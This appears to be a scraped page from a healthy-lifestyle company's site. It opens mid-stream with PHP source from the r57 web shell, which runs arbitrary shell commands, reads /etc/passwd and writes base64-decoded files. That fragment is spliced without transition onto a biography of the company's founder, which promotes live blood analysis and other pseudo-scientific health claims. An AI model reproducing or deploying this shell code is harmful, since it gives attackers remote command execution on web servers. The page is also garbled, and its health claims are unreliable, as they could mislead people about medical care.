"; die(); } if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } function ws($i) { return @str_repeat(" ",$i); } function ex($cfe) { $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function get_users() { $users = array(); $rows=file('/etc/passwd'); if(!$rows) return 0; foreach ($rows as $string) { $user = @explode(":",$string); if(substr($string,0,1)!='#') array_push($users,$user[0]); } return $users; } function we($i) { if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Не могу записать в файл '; } else { $text = "[-] ERROR! Can't write in file "; } echo "
".$text.$i."
"; return null; } function re($i) { if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Не могу прочитать файл '; } else { $text = "[-] ERROR! Can't read file "; } echo "
".$text.$i."
"; return null; } function ce($i) { if($GLOBALS['language']=="ru"){ $text = "Не удалось создать "; } else { $text = "Can't create "; } echo "
".$text.$i."
"; return null; } function fe($l,$n) { $text['ru'] = array('Не удалось подключиться к ftp серверу','Ошибка авторизации на ftp сервере','Не удалось поменять директорию на ftp сервере'); $text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can't change dir on ftp server'); echo "
".$text[$l][$n]."
"; return null; } function mr($l,$n) { $text['ru'] = array('Не удалось отправить письмо','Письмо отправлено'); $text['eng'] = array('Can't send mail','Mail sent'); echo "
".$text[$l][$n]."
"; return null; } function perms($mode) { if ($GLOBALS['windows']) return 0; if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); } function in($type,$name,$size,$value) { $ret = ""; return $ret; } function which($pr) { $path = ex("which $pr"); if(!empty($path)) { return $path; } else { return $pr; } } function cf($fname,$text) { $w_file=@fopen($fname,"w") or we($fname); if($w_file) { @fputs($w_file,@base64_decode($text)); @fclose($w_file); } } function sr($l,$t1,$t2) { return "
".$t1."".$t2."


 

Denise Mari
Denise Mari is the Founder and Director of Organic Avenue, a healthy lifestyle company based in New York City dedicated to spreading the LOVE (live.organic.vegan.experience™). She is presently working on her second Masters Degree in Human Nutrition from the University of Bridgeport. Denise is a certified Phlebotomist, Colon Hydro-therapist, and Living Foods Lifestyle Coach. Denise is an associate of Dr. Robert O. Young, Ph.D., D.Sc., N.D., Author of the pH Miracle, and has been conducting advanced research in “The New Biology” using Live Blood Microscopy. Denise has studied/trained with many of the top raw leaders in the world including: Brian Clement, Juliano, Chad Sarno, Elaina Love, Renee Loux Underkoffler, Matt Amsden, Victoria Boutenko, David Wolfe and Jeremy Saffron. Denise has led retreats, cleanses, and fasts for thousands of people and is the inspiration behind the wildly successful LOVE™ programs launched in NYC in 2000. Denise studies Vipassana Meditation and Dharma Mittra Yoga. She has traveled extensively in search of Truth, LOVE, and well-being. She presently lives in New York with her two dogs, Ahimsa and Shalom.

Denise is available for consultation and live blood analysis. Call her at 212-334-4593 or send an email to denise@organicavenue.com to make an appointment.
Continue
Opportunities - Order Tracking - About Organic Avenue - Contact Us - Privacy Policy - Shipping Information
Membership Info - Security - Terms Of Use - Ordering